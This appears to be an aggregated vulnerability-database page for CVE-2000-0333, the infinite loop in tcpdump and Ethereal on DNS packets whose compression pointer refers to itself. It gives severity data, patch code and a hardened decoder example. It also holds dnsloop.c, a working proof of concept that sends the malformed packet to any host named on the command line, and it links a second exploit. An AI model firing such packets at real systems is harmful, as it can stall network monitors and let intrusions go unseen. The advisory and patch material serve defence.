CVE-2000-0333
CVSS 5.0
Published: 1999-05-31 00:00:00
Revised: 2008-09-10 15:04:09
NMCOES    

[Original] tcpdump, Ethereal, and other sniffer packages allow remote attackers to cause a denial of service via malformed DNS packets in which a jump offset refers to itself, which causes tcpdump to enter an infinite loop while decompressing the packet.


[CNNVD] Multiple Sniffer Vendor DNS Decode Vulnerability (CNNVD-199905-054)

        A vulnerability exists in tcpdump, Ethereal, and other sniffer packages. A remote attacker can cause a denial of service with a malformed DNS packet in which a jump offset points to itself, which makes tcpdump enter an infinite loop while decompressing the DNS packet.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:lbl:tcpdump:3.5a
cpe:/a:ethereal_group:ethereal:0.8.4
cpe:/a:ethereal_group:ethereal:0.8.6
cpe:/a:ethereal_group:ethereal:0.8.5
cpe:/a:lbl:tcpdump:3.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0333
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0333
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-054
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1165
(VENDOR_ADVISORY)  BID  1165
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SOL.4.10.10005021942380.2077-100000@paranoia.pgci.ca
(VENDOR_ADVISORY)  BUGTRAQ  20000502 Denial of service attack against tcpdump

- Vulnerability information

Multiple Sniffer Vendor DNS Decode Vulnerability
Medium  Other
1999-05-31 00:00:00 2006-09-05 00:00:00
Remote
        A vulnerability exists in tcpdump, Ethereal, and other sniffer packages. A remote attacker can cause a denial of service with a malformed DNS packet in which a jump offset points to itself, which makes tcpdump enter an infinite loop while decompressing the DNS packet.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
        Upgrading to 0.8.7 of Ethereal will solve this problem.
        The current tree of tcpdump has a fix in place; this fix is not present in the 3.5 alpha tree, however.
        The author of this vulnerability suggests replacing the ns_nprint function with the following:

        static const u_char *
        ns_nprint(register const u_char *cp, register const u_char *bp)
        {
                register u_int i, j;
                register const u_char *rp;
                register int compress;

                i = *cp++;
                j = 0;                  /* counts labels and pointers followed */
                rp = cp + i;
                if ((i & INDIR_MASK) == INDIR_MASK) {
                        rp = cp + 1;
                        compress = 1;
                } else
                        compress = 0;
                if (i != 0)
                        /* the j < 256 bound is the fix: a pointer that refers to
                         * itself can no longer keep this loop spinning forever */
                        while ((i && cp < snapend) && (j < 256)) {
                                j++;
                                if ((i & INDIR_MASK) == INDIR_MASK) {
                                        /* compression pointer: jump to offset within the message */
                                        cp = bp + (((i << 8) | *cp) & 0x3fff);
                                        i = *cp++;
                                        continue;
                                }
                                if (fn_printn(cp, i, snapend))
                                        break;
                                cp += i;
                                putchar('.');
                                i = *cp++;
                                if (!compress)
                                        rp += i + 1;
                        }
                else
                        putchar('.');
                return (rp);
        }
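The replacement above stops the loop from running forever by capping it at 256 iterations. The decoder that follows is an added example written for this page, not tcpdump's or Ethereal's code, and it shows the stricter check a hardened parser can apply instead: every compression pointer must refer to an offset earlier in the message, which is what RFC 1035 pointers are meant to do, so a pointer to itself (the packet this advisory describes) or any chain that eventually jumps forward is rejected as malformed rather than followed. Both packets are constructed here; loop_query mirrors the 18-byte layout the dnsloop.c program on this page builds, and the function names and the choice to also reject pointers into the 12-byte header are my own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HEADER_LEN   12
#define DNS_MAX_NAME_LEN 255

/* Decode the (possibly compressed) name at pkt[off] into a dotted string.
 * Returns the number of bytes the name occupies at its original position
 * (what the caller must skip to reach the next field), or -1 if the name
 * is malformed or its pointers loop. Helper written for this example; it
 * is not tcpdump's ns_nprint. */
int dns_name_decode(const uint8_t *pkt, size_t len, size_t off,
                    char *out, size_t outlen)
{
    size_t pos = off, consumed = 0, outpos = 0, namelen = 0;
    int jumped = 0;

    if (outlen == 0)
        return -1;
    for (;;) {
        if (pos >= len)
            return -1;                    /* ran off the end of the packet */
        uint8_t c = pkt[pos];
        if ((c & 0xC0) == 0xC0) {         /* two-byte compression pointer */
            if (pos + 1 >= len)
                return -1;
            size_t target = ((size_t)(c & 0x3F) << 8) | pkt[pos + 1];
            if (!jumped)
                consumed = pos + 2 - off; /* name ends here at its original site */
            /* RFC 1035 pointers refer to a PRIOR occurrence of a name, so a
             * valid hop always moves backwards. Requiring target < pos rejects
             * a pointer to itself (target == pos, the case in this advisory)
             * and every longer cycle, because a cycle needs a forward hop. */
            if (target < DNS_HEADER_LEN || target >= pos)
                return -1;
            pos = target;
            jumped = 1;
            continue;
        }
        if (c & 0xC0)
            return -1;                    /* 0x40/0x80 label types not handled */
        if (c == 0) {                     /* root label terminates the name */
            if (!jumped)
                consumed = pos + 1 - off;
            break;
        }
        if (pos + 1 + c > len)
            return -1;                    /* label runs past the packet */
        namelen += c + 1;
        if (namelen > DNS_MAX_NAME_LEN)
            return -1;                    /* wire-format name too long */
        if (outpos + c + 2 > outlen)
            return -1;                    /* room for '.', label and NUL */
        if (outpos > 0)
            out[outpos++] = '.';
        memcpy(out + outpos, pkt + pos + 1, c);
        outpos += c;
        pos += 1 + c;
    }
    out[outpos] = '\0';
    return (int)consumed;
}

/* Constructed packets for the demo, not captured traffic. */

/* Same layout dnsloop.c builds: qdcount = 1 and the question name at
 * offset 12 is 0xC00C, a compression pointer to offset 12, i.e. itself. */
static const uint8_t loop_query[18] = {
    0xEE, 0xA6, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xC0, 0x0C, 0x00, 0x01, 0x00, 0x01
};

/* Legitimate compression: the second question's name is a pointer back to
 * "www.example.com", which is spelled out at offset 12. */
static const uint8_t valid_query[39] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    3, 'w', 'w', 'w', 7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01,             /* qtype A, qclass IN */
    0xC0, 0x0C, 0x00, 0x01, 0x00, 0x01  /* pointer -> offset 12, A, IN */
};

int decode_loop_query(char *out, size_t n)
{ return dns_name_decode(loop_query, sizeof loop_query, 12, out, n); }
int decode_valid_first(char *out, size_t n)
{ return dns_name_decode(valid_query, sizeof valid_query, 12, out, n); }
int decode_valid_second(char *out, size_t n)
{ return dns_name_decode(valid_query, sizeof valid_query, 33, out, n); }

int main(void)
{
    char name[DNS_MAX_NAME_LEN + 1];
    printf("self-pointer: %d\n", decode_loop_query(name, sizeof name));
    printf("first name  : %d %s\n", decode_valid_first(name, sizeof name), name);
    printf("second name : %d %s\n", decode_valid_second(name, sizeof name), name);
    return 0;
}
```

Compiled and run, the self-referencing question returns -1 on its first hop, while the legitimate packet decodes both names to www.example.com with consumed lengths of 17 (the spelled-out name) and 2 (the pointer). Because every accepted hop strictly decreases the read offset, termination follows without any iteration counter; a two-pointer ping-pong such as 12 -> 14 -> 12 fails immediately because the offset 14 lies ahead of 12. An IDS or capture reader that also bounds the loop, as the tcpdump patch does, gets defence in depth: the counter covers label types the strict rule does not model.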

- Vulnerability information (19891)

Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1) (EDBID:19891)
linux remote
1999-05-31 Verified
0 Hugo Breton
N/A
source: http://www.securityfocus.com/bid/1165/info

A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS requests and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop while trying to decompress it. This will prevent the sniffer from displaying further packets. If tcpdump is being used as part of an intrusion detection system, this could allow an intruder to evade that system.

When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

/* dnsloop.c by Hugo Breton (bretonh@pgci.ca)

   This program illustrates the bug in tcpdump when handling jumps in the DNS
   hostname decompression.
*/


#include <stdio.h>
#include <string.h>
#include <strings.h>        /* bzero, bcopy */
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr, htons, INADDR_NONE */


int main(int argc,char * * argv)
{
        char p[18];         /* 12-byte DNS header followed by a 6-byte question */
        int sock;
        struct sockaddr_in sin;
        struct hostent * hoste;

        printf("dnsloop.c by Hugo Breton (bretonh@pgci.ca)\n");

        if(argc<2)
        {
                printf("usage: %s host\n",argv[0]);
                return(0);
        }

        bzero((void *) &sin,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(53);

        if((sin.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE)
        {
                if((hoste=gethostbyname(argv[1]))==NULL)
                {
                        printf("unknown host %s\n",argv[1]);
                        return(0);
                }
                
                bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);
        }

        bzero((void *) p,18);
        * ((unsigned short *) (p+0))=htons(867-5309);           /* transaction id (arbitrary) */
        * ((unsigned short *) (p+4))=htons(1);                  /* qdcount = 1 */
        * ((unsigned short *) (p+12))=htons(32768+16384+12);    /* 0xC00C: compression pointer to offset 12, itself */
        * ((unsigned short *) (p+14))=htons(1);                 /* qtype = A */
        * ((unsigned short *) (p+16))=htons(1);                 /* qclass = IN */

        if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)
        {
                printf("unable to create UDP socket\n");
                return(0);
        }

        if(sendto(sock,p,18,0,(struct sockaddr *) &sin,sizeof(sin))==-1)
        {
                printf("unable to send packet\n");
                return(0);
        }

        printf("packet sent to host %s\n",argv[1]);

        return(0);
}

- Vulnerability information (19892)

Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2) (EDBID:19892)
linux remote
1999-05-31 Verified
0 scut
N/A
source: http://www.securityfocus.com/bid/1165/info
 
A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS requests and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop while trying to decompress it. This will prevent the sniffer from displaying further packets. If tcpdump is being used as part of an intrusion detection system, this could allow an intruder to evade that system.

When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

http://www.exploit-db.com/sploits/19892.tar.gz

- Vulnerability information

4488
Multiple Sniffer Malformed DNS Packet Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-05-02 Unknown
Unknown Unknown

- Solution

Upgrade Gerald Combs Ethereal to version 0.8.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Sniffer Vendor DNS Decode Vulnerability
Failure to Handle Exceptional Conditions 1165
Yes No
1999-05-31 12:00:00 2009-07-11 01:56:00
This vulnerability was originally posted to the Bugtraq mailing list on May 31, 1999 by Sebastian <scut@nb.in-berlin.de>. The same vulnerability was reported to the Bugtraq mailing list on May 2, 2000 by Hugo Breton <bretonh@paranoia.pgci.ca>.

- Affected program versions

LBL tcpdump 3.5 alpha
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Gerald Combs Ethereal 0.8.6
Gerald Combs Ethereal 0.8.5
Gerald Combs Ethereal 0.8.4
Gerald Combs Ethereal 0.8.7

- Unaffected program versions

Gerald Combs Ethereal 0.8.7

- Vulnerability discussion

A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS requests and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop while trying to decompress it. This will prevent the sniffer from displaying further packets. If tcpdump is being used as part of an intrusion detection system, this could allow an intruder to evade that system.

When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

- Exploit

An exploit has been made available.

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
Upgrading to 0.8.7 of Ethereal will solve this problem.
The current tree of tcpdump has a fix in place; this fix is not present in the 3.5 alpha tree, however.

The author of this vulnerability suggests replacing the ns_nprint function with the following:

static const u_char *
ns_nprint(register const u_char *cp, register const u_char *bp)
{
        register u_int i, j;
        register const u_char *rp;
        register int compress;

        i = *cp++;
        j = 0;                  /* counts labels and pointers followed */
        rp = cp + i;
        if ((i & INDIR_MASK) == INDIR_MASK) {
                rp = cp + 1;
                compress = 1;
        } else
                compress = 0;
        if (i != 0)
                /* the j < 256 bound is the fix: a pointer that refers to
                 * itself can no longer keep this loop spinning forever */
                while ((i && cp < snapend) && (j < 256)) {
                        j++;
                        if ((i & INDIR_MASK) == INDIR_MASK) {
                                /* compression pointer: jump to offset within the message */
                                cp = bp + (((i << 8) | *cp) & 0x3fff);
                                i = *cp++;
                                continue;
                        }
                        if (fn_printn(cp, i, snapend))
                                break;
                        cp += i;
                        putchar('.');
                        i = *cp++;
                        if (!compress)
                                rp += i + 1;
                }
        else
                putchar('.');
        return (rp);
}

- References
